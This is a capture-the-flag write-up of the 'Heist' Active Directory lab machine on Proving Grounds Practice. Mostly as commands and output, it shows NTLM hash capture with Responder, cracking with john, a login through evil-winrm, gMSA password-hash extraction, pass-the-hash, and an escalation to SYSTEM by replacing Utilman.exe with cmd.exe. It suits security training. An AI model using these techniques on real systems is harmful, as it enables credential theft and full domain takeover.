Heist — PG Practice(Write UP)

Heist is an Active Directory Machine on proving grounds practice. The initial foothold was capturing NTLM credentials with the responder.

Nmap scan result of the Heist Server:

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ cat heist.nmap 
# Nmap 7.92 scan initiated Wed Jan  3 18:59:48 2024 as: nmap -sC -sV -Pn -oN heist.nmap 192.168.153.165
Nmap scan report for 192.168.153.165
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-03 13:30:36Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2023-11-14T05:10:15
|_Not valid after:  2024-05-15T05:10:15
|_ssl-date: 2024-01-03T13:31:30+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-01-03T13:30:50+00:00
8080/tcp open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-01-03T13:30:55
|_  start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Wed Jan  3 19:01:36 2024 -- 1 IP address (1 host up) scanned in 107.70 seconds

• Port 53/tcp: Running Simple DNS Plus.
• Port 88/tcp: Microsoft Windows Kerberos for secure authentication.
• Port 135/tcp: Microsoft Windows RPC service.
• Ports 139/tcp and 445/tcp: Microsoft Windows NetBIOS and possibly Microsoft Directory Services.
• Ports 389/tcp, 3268/tcp: Microsoft Windows Active Directory LDAP services.
• Port 464/tcp: Potentially for kpasswd5, related to Kerberos.
• Port 593/tcp: Microsoft Windows RPC over HTTP.
• Port 636/tcp: Likely secured LDAP service (wrapped by TCP).
• Port 3269/tcp: Similar to 636/tcp, secured LDAP service (wrapped).
• Port 3389/tcp: Microsoft Terminal Services (RDP), with detailed SSL certificate information and RDP NTLM info, indicating the target is a Windows system, specifically ‘DC01’ in the ‘HEIST’ domain.
• Port 8080/tcp: Running Werkzeug HTTP server version 2.0.1 with Python 3.9.0. It hosts a web application titled “Super Secure Web Browser”.

Added a records for heist.offsec and dc01.heist.offsec to /etc/hosts file

Opening Port 8080 on the web browser, Web Browser App.

Entering localhost in url field results an error page.

Then turning on python http.server on port 80 I visited the url on search url bar and the Directory structure got listed and I also got msg of visit in my http.server terminal.

Now If I turn on responder on my vpn tun0 and try to visit my ip using that. Let’s see what we get.

For my surprise I got NTLM hash of some user named enox.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0
  To support this project:
  Patreon -> <https://www.patreon.com/PythonResponder>
  Paypal  -> <https://paypal.me/PythonResponder>
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [192.168.45.203]
    Responder IPv6             [fe80::f9ac:c1b0:1888:1951]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Current Session Variables:
    Responder Machine Name     [WIN-3ZM4RQIJ3VA]
    Responder Domain Name      [5TLM.LOCAL]
    Responder DCE-RPC Port     [47726]
[+] Listening for events...                                                                                                                       
[HTTP] NTLMv2 Client   : 192.168.153.165
[HTTP] NTLMv2 Username : HEIST\\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:<REDUCTED>:<REDUCTED>:0101000000000000A8E0AA97553EDA0129F54E4AB943C6DE0000000002000800350054004C004D0001001E00570049004E002D0033005A004D0034005200510049004A0033005600410004001400350054004C004D002E004C004F00430041004C0003003400570049004E002D0033005A004D0034005200510049004A003300560041002E00350054004C004D002E004C004F00430041004C0005001400350054004C004D002E004C004F00430041004C0008003000300000000000000000000000003000002184FB7FA927C34729731C2A223CA1542BCB740A2C3C6CB8F29853E2F03C2D9C0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200300033000000000000000000                                           
[+] Exiting...

I saved the hash to enox.hash and tried with john to crack.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ john enox.hash                                                
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
c********a       (enox)     
1g 0:00:00:00 DONE 2/3 (2024-01-03 20:40) 50.00g/s 477700p/s 477700c/s 477700C/s 123456..Peter
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

and I got the password within a blink.

Using this credential. I got access using evil-winrm

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u enox -p california -i 192.168.153.165
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\enox\\Documents> whoami
heist\\enox

Now if I search for txt files I found 2 files.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> get-childitem -path C:\\Users\\ -include *.txt -file -recurse -erroraction silentlycontinue

    Directory: C:\\Users\\enox\\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         1/3/2024   5:27 AM             34 local.txt
-a----        5/27/2021   7:03 AM            239 todo.txt
*Evil-WinRM* PS C:\\Users\\enox\\Documents>

I got local flag using cat commaand

*Evil-WinRM* PS C:\\Users\\enox\\Documents> cat C:\\Users\\enox\\Desktop\\local.txt
9138c0caa8a81d2082df2f40891ed1a6
*Evil-WinRM* PS C:\\Users\\enox\\Documents> cat C:\\Users\\enox\\Desktop\\todo.txt
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]

and got content of todo file.

Using net user /domain i found users on this domain.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> net user /domain

User accounts for \\\\
-------------------------------------------------------------------------------
Administrator            enox                     Guest
krbtgt
The command completed with one or more errors.

We are on enox If we check group membership of enox we can see

*Evil-WinRM* PS C:\\Users\\enox\\Documents> net user enox /domain
User name                    enox
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            8/31/2021 5:09:05 AM
Password expires             Never
Password changeable          9/1/2021 5:09:05 AM
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   11/14/2023 9:10:55 PM
Logon hours allowed          All
Local Group Memberships      *Remote Management Use
Global Group memberships     *Web Admins           *Domain Users
The command completed successfully.

We can see enox is member of web admins.

Uploaded WinPeasx64.exe to target system.

*Evil-WinRM* PS C:\\Users\\enox\\Documents> upload winpeasx64.exe
                                        
Info: Uploading /home/kali/offsec/heist/winpeasx64.exe to C:\\Users\\enox\\Documents\\winpeasx64.exe
                                        
Data: 3183272 bytes of 3183272 bytes copied
                                        
Info: Upload successful!

using winpeas I found there is a service account which is svc_apache$

We also found on todo.txt file that

- Use group managed service account for apache [DONE]

So hopefully maybe this will be the hole to get Highest Privilege.

Running GMSAPasswordReader.exe with — acountname svc_apache

*Evil-WinRM* PS C:\\Users\\enox\\Documents> .\\gmsapasswordreader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : B8730DFF931E27DC2D3A77BBDA4B5253
[*]       aes128_cts_hmac_sha1 : E4A2B58F686F64C56026456196555C32
[*]       aes256_cts_hmac_sha1 : D2CF4C019A5EAC62F432AF99B230F9079658DC8A0071E4E2F11C1EF0FA257756
[*]       des_cbc_md5          : 7CBFF2A41FC2D0D6

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 526C435B8E4CF11F447D6EF7152665BB
[*]       aes128_cts_hmac_sha1 : 19565C12FDE19AD1033BA3BBD56DD230
[*]       aes256_cts_hmac_sha1 : 43F6DECE6269A588687ACFF41F633A0F7AA9C3FBC7FEAB8BE6981854C19FE817
[*]       des_cbc_md5          : 4AEA91DCEF918F29

I got rc4_hmac hash of svc_apache$ user which is same like nt hash, that means we can use this to login to evil-winrm.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u svc_apache$ -H "526C435B8E4CF11F447D6EF7152665BB" -i 192.168.216.165
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> whoami
heist\\svc_apache$
*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents>

Now we have foot in service accounts.

If we check the privsec permission of the service account.

We can see that it has SeRestorePrivilege is enabled.

Searching with google on this I found

Reference: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

I found the Utilman.exe file using get-childitem cmdlet

*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> get-childitem -path C:\\Windows\\System32\\ -include utilman.exe -file -recurse -erroraction silentlycontinue

    Directory: C:\\Windows\\System32
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/28/2021   4:10 AM         113664 Utilman.exe

I moved the utilman.exe to utilman.old

*Evil-WinRM* PS C:\\Users\\svc_apache$\\Documents> mv C:\\Windows\\System32\\Utilman.exe C:\\Windows\\System32\\Utilman.old

Then I moved cmd.exe to Utilman.exe

*Evil-WinRM* PS C:\\Windows\\System32> mv cmd.exe Utilman.exe

Opened the rdp session using rdesktop

Now I pressed win+u key and the cmd prompt appeared

I found I have cmd now as NT Authority\System

from Administrator’s Desktop I found proof flag.